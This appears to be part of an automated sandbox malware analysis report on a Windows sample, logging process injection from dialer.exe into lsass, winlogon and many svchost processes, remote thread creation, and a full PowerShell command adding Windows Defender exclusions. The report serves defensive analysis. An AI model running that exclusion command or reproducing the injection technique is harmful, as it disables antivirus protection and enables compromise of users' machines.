          Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_25-413
          Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_62-468
          Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_64-91
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\winlogon.exe Code function: 30_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC647D90
          Source: C:\Windows\System32\dialer.exe Code function: 64_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,64_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,25_2_00000001400017EC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
          Source: C:\Windows\System32\winlogon.exe Code function: 30_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC647D90
          Source: C:\Windows\System32\winlogon.exe Code function: 30_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC64D2A4
          Source: C:\Windows\System32\winlogon.exe Code function: 30_2_00000225DC6A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC6A7D90
          Source: C:\Windows\System32\winlogon.exe Code function: 30_2_00000225DC6AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00000225DC6AD2A4
          Source: C:\Windows\System32\lsass.exe Code function: 36_2_00000202C0AED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000202C0AED2A4
          Source: C:\Windows\System32\lsass.exe Code function: 36_2_00000202C0AE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_00000202C0AE7D90
          Source: C:\Windows\System32\svchost.exe Code function: 39_2_000002A66130D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002A66130D2A4
          Source: C:\Windows\System32\svchost.exe Code function: 39_2_000002A661307D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000002A661307D90
          Source: C:\Windows\System32\dwm.exe Code function: 40_2_000002BAAEDB7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000002BAAEDB7D90
          Source: C:\Windows\System32\dwm.exe Code function: 40_2_000002BAAEDBD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000002BAAEDBD2A4
          Source: C:\Windows\System32\dialer.exe Code function: 63_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,63_2_0000000140001160
          Source: C:\Windows\System32\svchost.exe Code function: 65_2_0000026A879CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_0000026A879CD2A4
          Source: C:\Windows\System32\svchost.exe Code function: 65_2_0000026A879C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_0000026A879C7D90
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000179537A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000179537A7D90
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000179537AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_00000179537AD2A4
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000002295D56D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000002295D56D2A4
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000002295D567D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000002295D567D90
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_0000025306E6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_0000025306E6D2A4
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_0000025306E67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_0000025306E67D90
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001845B3AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001845B3AD2A4
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001845B3A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_000001845B3A7D90

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAE2A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1845B370000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19E29D00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\explorer.exe base: 3440000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13F83A20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22360790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24FBB770000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1E7778B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1D2DB850000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26161A70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 208B1FB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E0571F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B9F4B60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10DF0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D661170000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 23A75740000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D760000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe Code function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,25_2_0000000140001C88
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB273C
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DC67273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C0B1273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6133273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AED8273C
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 8799273C
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5377273C
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D53273C
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D273C
          Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B37273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: EBFD273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5904273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A9E7273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7316273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4E86273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 473C273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6F9D273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 83BC273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D3F7273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A415273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: BDF3273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C026273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C9F3273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 644B273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7B2A273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4F6273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2AB4273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4ADB273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 199273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 25DA273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F535273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F0D6273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FFB273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C257273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8BCE273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6694273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 13EF273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8D57273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 69B4273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CC74273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5DA7273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 199D273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F389273C
          Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3B8273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 29D0273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 344273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC69273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7897273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 641A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60DB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83A2273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6079273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB77273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 778B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DB85273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 61A7273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B1FB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 571F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F4B6273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 10DF273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6117273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7574273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D73273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D76273C
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAE2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
